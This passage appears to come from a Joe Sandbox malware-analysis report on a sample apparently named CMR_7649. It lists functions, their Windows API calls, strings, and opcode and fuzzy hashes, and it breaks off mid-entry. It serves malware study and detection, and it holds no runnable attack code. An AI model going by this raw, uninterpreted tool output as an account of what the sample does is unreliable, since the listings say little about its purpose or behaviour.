                                                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                • DeleteObject.GDI32(?), ref: 004301D0
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3969911579-0
                                                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                • String ID: 0
                                                • API String ID: 956284711-4108050209
                                                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 1965227024-3771769585
                                                • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove_wcslen
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 369157077-1007645807
                                                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32 ref: 00445BF8
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                • __wcsicoll.LIBCMT ref: 00445C33
                                                • __wcsicoll.LIBCMT ref: 00445C4F
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 3125838495-3381328864
                                                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$CharNext
                                                • String ID:
                                                • API String ID: 1350042424-0
                                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                • _wcscpy.LIBCMT ref: 004787E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 3052893215-2127371420
                                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 2295938435-2354261254
                                                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 3038501623-2263619337
                                                • Opcode ID: 0ed174719ccce37c49a7b10a239214af4415cbf245d9ef728fb1cecd9ea5956d
                                                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                • Opcode Fuzzy Hash: 0ed174719ccce37c49a7b10a239214af4415cbf245d9ef728fb1cecd9ea5956d
                                                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 2295938435-8599901
                                                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • timeGetTime.WINMM ref: 00443B67
                                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                • SetActiveWindow.USER32(?), ref: 00443BEC
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                • IsWindow.USER32(?), ref: 00443C3A
                                                • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                • String ID: BUTTON
                                                • API String ID: 1834419854-3405671355
                                                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                • LoadStringW.USER32(00000000), ref: 00454040
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • _wprintf.LIBCMT ref: 00454074
                                                • __swprintf.LIBCMT ref: 004540A3
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 455036304-4153970271
                                                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                • _memmove.LIBCMT ref: 00467EB8
                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                • _memmove.LIBCMT ref: 00467F6C
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
